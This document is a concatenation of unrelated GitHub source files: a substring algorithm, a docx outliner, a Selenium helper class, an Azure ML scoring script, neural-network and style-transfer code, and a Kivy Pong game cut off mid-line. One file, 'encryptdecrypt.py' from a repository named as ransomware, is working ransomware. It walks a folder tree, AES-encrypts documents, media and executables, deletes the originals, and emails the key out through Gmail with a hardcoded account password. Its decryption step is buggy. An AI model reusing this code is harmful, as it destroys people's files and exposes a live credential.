d, dt = {}, dict.fromkeys(target, 0)
for c in target: d[c] = d.get(c, 0) + 1
pi, pj = 0, 0
count = 0
ans = ''
while pj < len(source):
if source[pj] in d:
if dt[source[pj]] < d[source[pj]]:
count += 1
dt[source[pj]] += 1
if count == len(target): # same char count
while pi < pj:
if source[pi] in dt:
if dt[source[pi]] == d[source[pi]]: # skip the useless
break
dt[source[pi]] -= 1
pi += 1
if ans == '' or (pj - pi) < len(ans): # new ans
ans = source[pi:pj + 1]
dt[source[pi]] -= 1
pi += 1
count -= 1
pj += 1
return ans | ultimate010/codes_and_notes | 32_minimum-window-substring/minimum-window-substring.py | minimum-window-substring.py | py | 1,173 | python | en | code | 0 | github-code | 13 |
18807651704 | # -*- coding: utf-8 -*-
# by Alejandro Rojo Gualix 2022-02 ...
__author__ = 'Alejandro Rojo Gualix'
"""
pip install python-docx freeplane-io
"""
import sys
import argparse
from pathlib import Path
import re
import freeplane
# python-docx
from docx import Document
from docx.enum.text import WD_COLOR_INDEX
"""
SR. No. Colour Name In WD_COLOR_INDEX Colour Description
1. AUTO Default or No Colour
2. BLACK Black Colour
3. BLUE Blue Colour
4. BRIGHT_GREEN Green Colour
5. DARK_BLUE Dark Blue Colour
6. DARK_RED Dark Red Colour
7. DARK_YELLOW Dark Yellow Colour
8. GRAY_25 Light Gray Colour
9. GRAY_50 Dark Gray Colour
10. GREEN Dark Green Colour
11. PINK Magenta Colour
12. RED Red Colour
13. TEAL Dark Cyan Colour
14. TURQUOISE Cyan Colour
15. VIOLET Dark Magenta Colour
16. WHITE White Colour
17. YELLOW Yellow Colour
"""
from summarizer import *
extensions = ['*.odt', '*.docx']
extensions = ['*.docx']
class Outliner:
def __init__(self, file: Path):
self.file = file
# look for title?
self.name = file.stem
self.document = Document(file)
self._output_document = Document()
self._output_midmapping = None
def extract_marks(self, doc_file: Path = None, freeplane_file: Path = None, summarizer=None,
select_bold=True, select_underline=False, highlighted_color=None):
sample = ''
for paragraph in self.document.paragraphs:
sample += paragraph.text + '\n'
if len(sample) > 100:
break
if not sample:
return
def text_filter(run):
# print(run.font.highlight_color, run.text)
return (select_bold and run.bold) or \
(select_underline and run.underline) or \
(highlighted_color and run.font.highlight_color == highlighted_color)
if freeplane_file:
self._output_midmapping = freeplane.Mindmap()
self._output_midmapping.rootnode.plaintext = self.name
parents_stack = [self._output_midmapping.rootnode]
def append_summary(text):
result = summarize(text, summarizer, max_length=min(120, int(len(text) * 0.3)))
summary = result[0]['summary_text']
# print('summary', summary)
if doc_file:
self._output_document.add_paragraph(summary)
if freeplane_file: # Freeplane
node = parents_stack[-1].add_child(summary)
node._node.attrib["STYLE"] = 'fork'
styles = set()
section_text = []
for paragraph in self.document.paragraphs:
style = paragraph.style.name
styles.add(style)
if style.startswith("Title") or style.startswith("Heading"):
if summarizer and section_text:
compiled_text = '\n'.join(section_text)
append_summary(compiled_text)
section_text = []
if style.startswith("Title"):
level = 1 # TODO 0
elif style.startswith("Heading"):
m = re.search(r'(\d+)$', style)
level = int(m.group(0))
if doc_file:
self._output_document.add_heading(paragraph.text, level)
if freeplane_file:
# Freeplane
# print('\t', level, len(parents_stack) - 1)
if level > len(parents_stack) - 1: # rise level
while level > len(parents_stack):
parents_stack.append(parents_stack[-1].add_child('<missing branch>'))
else: # drop: same or lower the level
while len(parents_stack) - level > 0:
parents_stack.pop()
node = parents_stack[-1].add_child(paragraph.text)
node._node.attrib["STYLE"] = 'bubble'
parents_stack.append(node)
# elif paragraph.style.name == "Normal":
# elif style.startswith("Body Text"):
else: # Body Text
if summarizer:
# accumulate whole section
section_text.append(paragraph.text)
else:
selected_text = [run.text for run in paragraph.runs if text_filter(run)]
if selected_text:
if doc_file:
compiled_text = ' […] '.join(selected_text)
self._output_document.add_paragraph(compiled_text)
if freeplane_file: # Freeplane
# TODO: use topic models
node_parent = parents_stack[-1].add_child(selected_text[0])
node_parent._node.attrib["STYLE"] = 'fork'
for segment in selected_text[1:]:
node = node_parent.add_child(segment)
node._node.attrib["STYLE"] = 'fork'
# summarize residual last section if needed
if summarizer and section_text:
compiled_text = '\n'.join(section_text)
append_summary(compiled_text)
section_text = []
# for h, t in zip(headings, texts):
# print(h, t)
# print('\n'.join(styles))
if doc_file:
self._output_document.save(doc_file)
if freeplane_file:
self._output_midmapping.save(freeplane_file, encoding='utf-8')
# if not doc_file and not freeplane_file:
def process_file(input_file_path: Path, actions: dict,
doc_path: Path = None, freeplane_path: Path = None, file_tag='outline'):
assert input_file_path.exists(), 'input file not found'
outliner = Outliner(input_file_path)
if doc_path and doc_path.is_dir():
doc_path = Path(doc_path, f'{input_file_path.stem}_{file_tag}.docx')
if freeplane_path and freeplane_path.is_dir():
freeplane_path = Path(freeplane_path, f'{input_file_path.stem}_{file_tag}.mm')
print(input_file_path, ' --> ', doc_path, freeplane_path)
outliner.extract_marks(doc_file=doc_path, freeplane_file=freeplane_path, **actions)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""Reads a `docx` word document and outputs a new document that preserves document structure (headings) but replaces content with:
+ An automatic summary (first detects language, then summarizes)
A compilation of bold/highlighted segments (they were annotated by the user first maybe because they represent important terms or ideas
""")
# positional
parser.add_argument('input', metavar='input file', type=str,
help='input path (file or folder) for highlighting compilation or automatic summarization')
# parser.add_argument('output', metavar='output file', type=str, help='output path (file or folder)')
# OUTPUT
parser.add_argument('-d', '--docx', type=str, help='Specify word document output path')
parser.add_argument('-f', '--freeplane', type=str, help='Specify freeplane document output path')
parser.add_argument('-r', '--recursive', action='store_true',
help='Use it along a folder input and output: it makes available all files within subfolders')
# conversion options
parser.add_argument('-b', '--bold', action='store_true', help='filter bold content')
parser.add_argument('-u', '--underline', action='store_true', help='filter underlined content')
parser.add_argument('-s', '--summary', type=str, help='creates a summary, it requires language code, eg.: en')
# optional & mutually exclusive
# parser.add_argument("-a", "--action", type=str, default='marks', choices=["marks", "summary"], help="Choose action to process document content")
args = parser.parse_args()
# print(args)
assert args.docx or args.freeplane, 'A docx or freeplane output file/folder must be provided'
input_path = Path(args.input)
assert input_path.exists(), 'input file/folder not found'
if args.summary:
summarizer = load_pipeline(language=args.summary)
actions = {'summarizer': summarizer}
file_tag = 'summary'
elif args.bold or args.underline:
actions = {'select_bold': args.bold, 'select_underline': args.underline}
file_tag = 'annotation'
else:
raise SyntaxError('some arguments must be provided to indicate action on content: (-b -u | -s <lang>)')
if input_path.is_file():
files = [input_path]
elif input_path.is_dir():
if args.docx:
assert Path(args.docx).is_dir()
if args.freeplane:
assert Path(args.freeplane).is_dir()
# get input files
if args.recursive:
files = input_path.rglob('*.docx')
else:
files = input_path.glob('*.docx')
assert files, 'Not .docx files found in ' + str(path2.resolve())
for file_path in files:
process_file(file_path, actions,
Path(args.docx) if args.docx else None, Path(args.freeplane) if args.freeplane else None,
file_tag)
| alerojorela/document-outliner | outliner.py | outliner.py | py | 9,271 | python | en | code | 0 | github-code | 13 |
20680351498 | from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from core.decorators import log_exception
from utilities.config import Config
import platform
import logging
import time
class BaseClass(object):
"""
Base class representation.
Contains all actions related to UI interaction.
All pages may be inherited from this class.
"""
def __init__(self, browser):
"""
:param browser: selenium.webdriver.*
"""
self.browser = browser
self.logger = logging.getLogger(self.__class__.__name__)
self.timeout = 10
@staticmethod
def sleep(s):
time.sleep(s)
@log_exception('Failed to clean cache and cookies')
def clean_coockies_and_cache(self):
if Config.BROWSERNAME == 'Chrome':
self.browser.delete_all_cookies()
self.browser.get('chrome://settings/clearBrowserData')
self.sleep(2)
ActionChains(self.browser).send_keys(Keys.TAB * 3 + Keys.DOWN * 3).perform()
self.sleep(2)
ActionChains(self.browser).send_keys(Keys.TAB * 4 + Keys.ENTER).perform()
self.sleep(5) # wait some time to finish
@log_exception('Failed to get web element with xpath: {}')
def _get_element(self, element, ec=ec.presence_of_element_located, wait=None):
"""
Function for getting WebElement from given xpath.
Also performs highlight of that element if Config.HIGHLIGHT is True.
:param element: str - web element xpath or can be selenium.webdriver.remote.webelement.WebElement
:param expected_condition: selenium.webdriver.support.expected_conditions.*
:param wait: int - element wait time, if None takes self.timeout
:return: element: selenium.webdriver.remote.webelement.WebElement
"""
if wait is None:
wait = self.timeout
if isinstance(element, str):
self.logger.debug('Waiting {} seconds for web element with condition: {}'.format(wait, ec.__name__))
wd_wait = WebDriverWait(self.browser, wait)
element = wd_wait.until(ec((By.XPATH, element)))
if element:
self.logger.debug('Got web element!')
if Config.HIGHLIGHT:
self._highlight(element)
return element
@log_exception('Failed to get web elements with xpath: {}')
def get_elements(self, xpath, wait=None):
"""
Get multiple elements by xpath.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:return: tuple of selenium.webdriver.remote.webelement.WebElement
"""
self.logger.debug('Getting web elements with xpath: {}'.format(xpath))
self._get_element(xpath, wait=wait)
elements = self.browser.find_elements_by_xpath(xpath)
self.logger.debug('Got web elements with xpath: {}'.format(xpath))
return elements
def _highlight(self, element):
"""
Highlight given web element with red border using JS execution.
WARNING: Contains time.sleep in 1 sec between scrolling to element and highlighting
:param element: selenium.webdriver.remote.webelement.WebElement
"""
self.execute_script(element, 'scrollIntoView(true);')
self.sleep(1)
self.execute_script(element, 'setAttribute("style", "color: red; border: 5px solid red;");')
self.sleep(1)
self.execute_script(element, 'setAttribute("style", "");')
@log_exception('Failed presence check of web element with xpath: {}')
def is_present(self, xpath, expected=True, wait=None):
"""
Presence check of web element on the UI.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param expected: boolean - expected to find it
:return: boolean - element presence
"""
found = False
expected_condition = ec.presence_of_element_located
if not expected:
expected_condition = ec.staleness_of
self.logger.info('Checking presence of web element with xpath: {}. Expected: {!s}'.format(xpath, expected))
found = self._get_element(xpath, expected_condition, wait=wait) is not None
self.logger.info('Presence check of web element with xpath: {}. Result: {!s}'.format(xpath, found))
return found
@log_exception('Failed visible check of web element with xpath: {}')
def is_visible(self, xpath, expected=True, wait=None):
"""
Visibility check of web element on the UI.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param expected: boolean - expected to be visible
:return: boolean - element visibility
"""
visible = False
expected_condition = ec.visibility_of_element_located
if not expected:
expected_condition = ec.invisibility_of_element_located
self.logger.info('Checking visibility of web element with xpath: {}. Expected: {!s}'.format(xpath, expected))
found = self._get_element(xpath, expected_condition, wait=wait).is_displayed()
self.logger.info('Visible check of web element with xpath: {}. Result: {!s}'.format(xpath, found))
return found
@log_exception('Failed to click web element with xpath: {}')
def click(self, xpath, wait=None, scroll=True):
"""
Click web element with given xpath
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
self.logger.info('Clicking web element with xpath: {}'.format(xpath))
element = self._get_element(xpath, ec.element_to_be_clickable, wait=wait)
if scroll:
self.execute_script(element, 'scrollIntoView(true);')
element.click()
self.logger.info('Clicked web element with xpath: {}'.format(xpath))
def execute_script(self, element, script):
"""
Execute JavaScript on the web element
:param element: selenium.webdriver.remote.webelement.WebElement
:param script: str - JS script body
:return: result of script execution
"""
if not element:
self.logger.error('Element is None. Cannot execute JS')
raise ValueError('Argument element cannot be None')
return self.browser.execute_script("return arguments[0].{}".format(script), element)
@log_exception('Failed to mouse over web element with xpath: {}')
def mouse_over(self, xpath, wait=None):
"""
Simulate mouse cursor over given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
actions = ActionChains(self.browser)
actions.move_to_element(self._get_element(xpath, wait=wait)).perform()
self.logger.info('Mouse over web element with xpath: {}'.format(xpath))
@log_exception('Failed to mouse over web element with xpath: {}')
def mouse_over_with_offset(self, xpath, xoffset, yoffset, wait=None):
"""
Simulate mouse cursor over given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
actions = ActionChains(self.browser)
actions.move_to_element_with_offset(self._get_element(xpath, wait=wait), xoffset, yoffset).perform()
self.logger.info('Mouse over web element with xpath: {}'.format(xpath))
@log_exception('Failed to move mouse to coordinates: {}, {}')
def mouse_move_to_coordinates(self, x, y):
"""
Simulate mouse cursor move.
:param x: int
:param y: int
"""
actions = ActionChains(self.browser)
actions.move_by_offset(x, y).perform()
@log_exception('Failed to drag mouse')
def mouse_drag(self, x1, y1, x2, y2):
"""
Simulate drag mouse from x1 y1 to x2 y2.
:param xpath: str - web element xpath
"""
actions = ActionChains(self.browser)
actions.move_by_offset(x1, y1)\
.click_and_hold()\
.move_by_offset(x2 - x1, y2 - y1)\
.release()\
.perform()
self.logger.info('Mouse drag for: {}, {}'.format(x2 - x1, y2 - y1))
@log_exception('Failed open URL: {}')
def open(self, url):
"""
Open given URL in browser
:param url: str - URL to open
"""
self.browser.get(url)
self.logger.info('Opened URL: {}'.format(url))
@log_exception('Failed open new tab: {}')
def open_new_tab(self):
"""
Open new tab in browser
"""
win_handles_befor = self.browser.window_handles
self.browser.execute_script("window.open('');")
win_handles_after = self.browser.window_handles
WebDriverWait(self.browser, self.timeout).until(ec.number_of_windows_to_be(len(win_handles_befor) + 1))
new_window = [x for x in win_handles_after if x not in win_handles_befor][0]
self.browser.switch_to_window(new_window)
@log_exception('Failed to switch tab: {}')
def switch_to_tab_with_num(self, tab_num):
"""
Switches driver to new tab only. Works by number of tab, counts from 0.
"""
self.browser.switch_to_window(self.browser.window_handles[tab_num])
@log_exception('Cannot switch to frame: {}')
def switch_to_frame(self, xpath, wait=None):
"""
Switch to frame
:param xpath: str - frame xpath
"""
self.browser.switch_to.frame(self._get_element(xpath, wait=wait))
@log_exception('Cannot switch to default frame')
def switch_to_default_frame(self):
"""
Switch to default frame
"""
self.browser.switch_to.default_content()
@log_exception('Cannot get text located: {}')
def get_text(self, xpath, wait=None):
"""
Get text of the web element
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
self.logger.info('Trying to get text from field with xpath: {}'.format(xpath))
result = self._get_element(xpath, ec.visibility_of_element_located, wait=wait).text
self.logger.info('Got text "{}" from field with xpath: {}'.format(result, xpath))
return result
@log_exception('Failed to type text into web element with xpath: {}')
def type(self, xpath, text, one_by_one=False, wait=None, lazy_wait=2):
"""
Type text into input field with given xpath
:param xpath: str - web element xpath
:param text: str - text to type
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self.logger.info('Typing "{}" into field with xpath: {}'.format(text, xpath))
input_field = self._get_element(xpath, ec.visibility_of_element_located, wait=wait)
if platform.system() == 'Darwin': # mac os
input_field.clear()
else: # others
input_field.send_keys(Keys.CONTROL, 'a', Keys.DELETE)
self.sleep(lazy_wait / 2)
if one_by_one:
for char in text:
input_field.send_keys(char)
else:
input_field.send_keys(text)
self.sleep(lazy_wait / 2)
self.logger.info('Typed "{}" into field with xpath: {}'.format(text, xpath))
@log_exception('Cannot send ENTER to the web element with xpath: {}')
def send_enter(self, xpath, wait=None, lazy_wait=1):
"""
Emulate sending ENTER key from keyboard to the given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self._get_element(xpath, wait=wait).send_keys(Keys.ENTER)
self.sleep(lazy_wait)
def submit_search(self, xpath, text, wait=None, lazy_wait=2):
"""
Type text into input field with given xpath and send ENTER key
:param xpath: str - web element xpath
:param text: str - text to type
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self.type(xpath, text, wait=wait, lazy_wait=lazy_wait)
self.send_enter(xpath, wait=wait, lazy_wait=lazy_wait)
def get_element_size(self, element_locator, wait=None):
"""
Return size of element in list
:param element_locator: str - xpath for element
:param wait: int - wait time for object
:return: dict contains width and heigth
"""
element = self._get_element(element_locator, wait=wait)
return element.size
| Derr22/python-selenium-behave-parallel-runner | core/base_class.py | base_class.py | py | 13,097 | python | en | code | 0 | github-code | 13 |
30787526166 | from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
import uuid
import hashlib
import os #암호화에 필요한 모듈 가져옴.
import smtplib
from email.mime.text import MIMEText #메일을 보낼 때 메시지의 제목과 본문을 설정
#arr는 잠그기 위한 확장자 list
arr = ['.txt', '.doc', '.docx', '.hwp', '.pptx', '.ppt', '.xls', '.pdf', '.ai', '.psd', '.tx', '.bmp', '.gif', '.png', '.jpg', '.jpeg', '.raw', '.tiff', '.was', '.wma', '.mp3', '.mp4', '.mkv', '.avi', '.flv', '.mov', '.7z', '.aip', '.alz', '.egg', '.zip', '.py', '.c', '.cpp', '.java', '.class', '.html', '.ini', '.lnk', '.exe', '.ttf', '.sys', '.dat', '.jar', '.md']
forChange = [] #확장자들의 요소들만을 가지고 있음.
linkForChange = [] #확장자들이 존재하는 링크list
link = 'C:\\Users\\tlatm\\OneDrive\\바탕 화면\\test' #심승민 컴퓨터 기준 test폴더 안 파일들
file_list = os.listdir(link) # link 경로에 있는 모든 파일들을 file_list로 저장.
def isFile(llist, llink):
noChange = [] #폴더 파일
global forChange
global linkForChange
ffile_list = llist #
global link
#현재 전체 파일list에서 확장자가 존재하는지를 확인하기 위한 이중 for문
for i in range(0, len(ffile_list)):
for j in range(0, len(arr)):
if ffile_list[i].find(arr[j]) >= 0: #파일 이름이 다음 확장자를 내포하고있다면,
linkForChange.append(llink + '\\' + ffile_list[i]) #경로와 확장자를 합쳐서 저장.
forChange.append(ffile_list[i]) #파일 추가.
#전체 파일 list랑 폴더list랑 확장자 list를 집합화 하여 중복을 제거함.
ffile_list_set = set(ffile_list)
forChange_set = set(forChange)
noChange_set = set(noChange)
noChange_set = ffile_list_set - forChange_set #전체 파일에서 확장자set를 빼주면, 폴더set이 나옴.
noChange = list(noChange_set)
if not len(noChange): # 더이상 폴더파일 이 존재하지않을 경우에 종료.
return
else:
for i in range(0, len(noChange)):
tempLink = link #임의 변수에 link의 경로를 미리 복사해놓음
link += '\\' + noChange[i] #이부분이 사실상 최종 경로.
ffile_list = os.listdir(link)
isFile(ffile_list, link)
link = tempLink #위에 부분이 끝나고 남아있는정보를 reset하기 위함.
isFile(file_list, link)
linkForChange_set = set(linkForChange)
linkForChange = list(linkForChange_set) #list에서 겹치는 파일을 제거
print(linkForChange)
'''
for i in range(0, len(linkForChange)):
Encryption(linkForChange[i])
'''
Block_Size = 256
chunksize = 256*1024
#
extension = [] #확장자 list
file_name = [] #파일 이름 list
#list의 index에 맞게 이름과 확장자 분리하여 저장 - 나중에 복호화 시 사용하기 위함
print("**암호화**")
print(hex(uuid.getnode()).encode('utf8')) #나중에 삭제!!! 테스트하기 쉬우라고 화면에 복호화 키 출력
original_password = hex(uuid.getnode()).encode('utf8') #mac address를 받아 16진수로 변환하여 암호로 사용
smtp = smtplib.SMTP('smtp.gmail.com', 587)
smtp.starttls() # TLS 사용시 필요
smtp.login('pythonransomware@gmail.com', 'bnzrajjwqrzllgvf') #복호화 키를 보낼 이메일 등록 - 주소, 비밀번호
msg = MIMEText(hex(uuid.getnode())) #복호화 키
msg['Subject'] = '테스트'
smtp.sendmail('pythonransomware@gmail.com', 'tlatmdals01@gmail.com', msg.as_string()) #복호화 키를 보낼 이메일, 복호화 키를 받을 이메일
smtp.quit()
# AES암호화를 위해서는 32바이트 key가 필요하다. hashlib을 이용하여 사용자 암호를 32바이트 key로 변환한다.
key = hashlib.pbkdf2_hmac(hash_name='sha256', password=original_password, salt=b'$3kj##agh_', iterations=100000)
#암호화 키를 생성함.
#암호화할 비밀도 encode("utf8")을 이용 bytes로 변환한다.
# text = input("암호화 하고자 하는 비밀: ").encode("utf8")
for k in range(0, len(linkForChange)):
fileFullname = linkForChange[k]
filename, FileExtension = os.path.splitext(linkForChange[k]) #파일의 이름과 확장자를 분리하여 각각 변수에
extension.append(FileExtension) #확장자를 list에 추가
file_name.append(filename) #파일 이름을 list에 추가
#복원할 때, 원래 파일의 크기가 필요하다. 다음과 같이 파일 사이즈를 얻은 후, 16byte로 만든다.
filesize = str(os.path.getsize(fileFullname)).zfill(16)
#암호화를 위해서 다음과 같이 AES 개체를 만든다. 복호화 할때에도 동일한 AES개체를 만들면 된다.
mode = AES.MODE_ECB
aes = AES.new(key, mode)
#파일을 불러 들인다. 동영상과 같은 대용량 파일의 경우, 한번에 불러들이면 에러가 난다.
#이를 방지하기 위해서 일정한 크기(위의 chunksize)로 나누어 불러들이고, 여러차례 암호화를 실시
#파일 암호화 파트
with open(fileFullname, 'rb') as infile: #바이트 모드로 읽기 test.txt
with open(filename + ".pay1oad", 'wb') as outfile: #바이트 모드로 쓰기 test.pay1oad
outfile.write(filesize.encode('utf-8'))
while True:
chunk = infile.read(chunksize)
#모든 파일을 불러들었으면, 반복문을 나가서 다음으로 넘어간다.
if len(chunk) == 0:
break
#마지막에 16바이트가 안될 경우에는 _을 삽입하여 16바이트로 만들어주어야 에러가 나지 않는다.
elif len(chunk) % 16 != 0:
chunk += b'_' * (256 - (len(chunk) % 256))
#다음과 같이 암호화된 부분을 새로운 파일에 입력한다.
outfile.write(aes.encrypt(chunk))
os.remove(fileFullname)
print("**복호화**")
original_password = input("password: ").encode('utf8')
#복호화를 위하여 AES 객체를 만든다. 사실 암호화과정에서 만든 AES 객체를 다시 이용해도 무방 \
key = hashlib.pbkdf2_hmac(hash_name='sha256', password=original_password, salt=b'$3kj##agh_', iterations=100000)
#복호화할 파일을 지정한다.
for l in range(0, len(linkForChange)):
filename = os.path.splitext(linkForChange[k])[0]
#파일을 불러들이다. 동영상과 같은 대용량 파일의 경우, 한번에 불러들이면 에러가 난다.
#이를 방지하기 위해서 일정한 크기(위의 chunksize)로 나누어 불러들이고, 여러차례 암호화를 실시
fileFullname = file_name[l] + '.pay1oad' #.pay1oad로 바뀐 확장자에 맞춰서 이름 변경
#파일 복호화 파트
with open(fileFullname, 'rb') as infile:
filesize = int(infile.read(16))
#복호화된 파일을 저장할 파일을 만든다.
with open(file_name[l] + extension[l], 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
#복호화된 내용을 새로운 파일에 삽입한다.
outfile.write(aes.decrypt(chunk))
#원래의 파일사이즈를 넘는 부분은 암호화과정에서 16byte로 만들기 위해서 _를 삽입한 부분이다.
#다음과 같이 truncate명령어를 써서 원래의 파일사이즈를 넘는 부분은 제거해 버린다.
outfile.truncate(filesize)
os.remove(fileFullname) #.payload 확장자 파일 삭제
print("복호화 완료")
| smpark0213/P-RansomeWare | encryptdecrypt.py | encryptdecrypt.py | py | 7,726 | python | ko | code | 0 | github-code | 13 |
1050886381 | import json
import joblib
import numpy as np
import os
# called when the deployment is created or updated
def init():
global model
# get the path to the registered model file and load it
# AZUREML_MODEL_DIR is an environment variable created during deployment.
# It is the path to the model folder (./azureml-models/$MODEL_NAME/$VERSION)
# Please provide your model's folder name if there is one
print(os.listdir(os.getenv('AZUREML_MODEL_DIR')))
model_path = os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model/model.pkl')
model = joblib.load(model_path)
# called when a request is received
def run(raw_data):
# get the input data as a numpy array
print(raw_data)
data = np.array(json.loads(raw_data)['input_data']['data'])
print(data, type(data))
# get a prediction from the model
predictions = model.predict(data)
# return the predictions as any JSON serializable format
return predictions.tolist()
# if __name__ == '__main__':
# raw_data = {
# "data": {
# "columns": [
# "Pregnancies",
# "PlasmaGlucose",
# "DiastolicBloodPressure",
# "TricepsThickness",
# "SerumInsulin",
# "BMI",
# "DiabetesPedigree",
# "Age"
# ],
# "index": [1],
# "data": [
# [
# 0,148,58,11,179,39.19207553,0.160829008,45
# ]
# ]
# }
# }
# # Json should be transformed to string before sending
# json_data = json.dumps(raw_data)
# json_data
# # set the environment variable 'AZUREML_MODEL_DIR' outside of deployment just for testing the script
# os.environ['AZUREML_MODEL_DIR'] = '/mnt/batch/tasks/shared/LS_root/mounts/clusters/farbodtaymouri2/code/my-azure-ml-projects/model-deployment/src'
# init()
# preds = run(raw_data=json_data)
# print(preds) | farbodtaymouri/my-azure-ml-projects | model-deployment-online/src/model/score.py | score.py | py | 1,873 | python | en | code | 0 | github-code | 13 |
42081593576 | def solution(number, limit, power):
answer = 0
anslist = []
for i in range(1, number + 1):
n = divnum(i)
if n > limit:
anslist.append(power)
else:
anslist.append(n)
answer = sum(anslist)
return answer
def divnum(num):
cnt = 0
sqr = int(num **(0.5))
if num == 1:
cnt = 1
else:
if num ** (0.5) == sqr:
cnt += 1
for i in range(1, sqr):
if num % i == 0:
cnt += 2
else:
for i in range(1, sqr+1):
if num % i == 0:
cnt += 2
return cnt
solution(10,5,2) | HotBody-SingleBungle/HBSB-ALGO | HB/pysrc/프로그래머스/레벨1/Day10(23_01_27)/기사단원의_무기.py | 기사단원의_무기.py | py | 665 | python | en | code | 0 | github-code | 13 |
41639258046 | import numpy as np
from sklearn.datasets import load_digits
from sklearn.model_selection import train_test_split
from SYF_ANN import *
normalization=16.0
# STEP 1: Load data, produce one-hot encoding of targets and split into training and testing
dig = load_digits()
onehot_target = [[1 if y==x else 0 for y in range(10)] for x in dig.target]
x_train, x_val, y_train, y_val = train_test_split(dig.data, onehot_target, test_size=0.1, random_state=20)
## STEP 2: Create network, fit the data
model = SYF_ANN(x_train/normalization, np.array(y_train))
model.fit(epochs=1500)
def get_acc(x, y):
acc = 0
for xx,yy in zip(x, y):
s = model.predict(xx)
if s == np.argmax(yy):
acc +=1
return acc/len(x)*100
## STEP 3: Bencmkark Accuracy
print("Training accuracy : ", get_acc(x_train/normalization, np.array(y_train)))
print("Test accuracy : ", get_acc(x_val/normalization, np.array(y_val)))
| JuanManuelHuerta/Quantitative_Strategy | 01_ANN/v02.py | v02.py | py | 931 | python | en | code | 1 | github-code | 13 |
41908860513 | import torch
import torch.optim as optim
from torch.autograd import Variable
from torchvision.transforms import ToPILImage
from neural_style_net import ContentLoss, StyleLoss
class Solver(object):
def __init__(self, model, content_var, style_var,
content_weight=1, style_weight=1000,
num_iters=200, gpu=False):
self.model = model
self.input_var, self.content_var, self.style_var = self._prepare_input(content_var, style_var, gpu)
self.num_iters = num_iters
self.gpu = gpu
self.content_criterion = ContentLoss(weight=content_weight)
self.style_criterion = StyleLoss(weight=style_weight)
self.optimizer = optim.LBFGS([self.input_var])
@staticmethod
def _prepare_input(content_var, style_var, gpu=False):
input_tensor = content_var.data.clone()
if gpu:
input_tensor = input_tensor.cuda()
dtype = torch.cuda.FloatTensor
else:
dtype = torch.FloatTensor
input_var = Variable(input_tensor.type(dtype), requires_grad=True)
return input_var, content_var, style_var
def train(self):
content_outputs = self.model(self.content_var)
style_outputs = self.model(self.style_var)
it = [0]
while it[0] <= self.num_iters:
def closure():
self.optimizer.zero_grad()
self.input_var.data.clamp_(0, 1)
input_outputs = self.model(self.input_var)
content_loss = style_loss = 0
for name, x in input_outputs['content'].items():
y = content_outputs['content'][name]
content_loss += self.content_criterion(x, y)
for name, x in input_outputs['style'].items():
y = style_outputs['style'][name]
style_loss += self.style_criterion(x, y)
if it[0] % 50 == 0:
print('it: {}, content: {}, style: {}'.format(it[0], content_loss.data[0], style_loss.data[0]))
total_loss = content_loss + style_loss
total_loss.backward()
it[0] += 1
return total_loss
self.optimizer.step(closure)
self.input_var.data.clamp_(0, 1)
styled_image = self.input_var
if self.gpu:
styled_image = styled_image.cpu()
return ToPILImage()(styled_image.data[0])
| dfridman1/neural-style-transfer | solver.py | solver.py | py | 2,455 | python | en | code | 1 | github-code | 13 |
18978410021 | from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty, StringProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.label import Label
from random import randint
from kivy.graphics import Color
from sys import exit
class PongPaddle(Widget):
score = NumericProperty(0)
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 2)
bounced = Vector(-1 * vx, vy)
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
who_wins = StringProperty("")
is_menu = StringProperty("No menu")
#def __init__(self, **kwargs):
# super(PongGame, self).__init__(**kwargs)
# self.menu = None
def serve_ball(self, vel = (4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def the_menu(self):
self.ball.velocity = 0, 0
self.menu = BoxLayout(orientation = "vertical", center_x = self.center_x, center_y = self.center_y)
lbl = Label(text = "menu")
self.menu.add_widget(lbl)
btn1 = Button(text = "Restart", on_press = self.the_resume)
btn1.bind(on_press = self.the_resume)
btn2 = Button(text = "Exit", on_press = self.get_out)
self.menu.add_widget(btn1)
self.menu.add_widget(btn2)
self.add_widget(self.menu)
def the_resume(self, instance):
self.who_wins = ""
self.player2.score = 0
self.player1.score = 0
self.menu.clear_widgets() #this is not working
self.remove_widget(self.menu) #Neither is this
self.is_menu = "No menu"
if self.who_wins == "Player 2 wins":
vel = (-4, 0)
else:
vel = (4, 0)
self.serve_ball(vel)
def get_out(self, instance):
exit()
def update(self, dt):
self.ball.move()
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
if (self.ball.y < 0) or (self.ball.top > self.height):
self.ball.velocity_y *= -1
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel = (4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel = (-4, 0))
if self.who_wins == "":
if self.player2.score >= 1:
self.who_wins = "Player 2 wins"
elif self.player1.score >= 10:
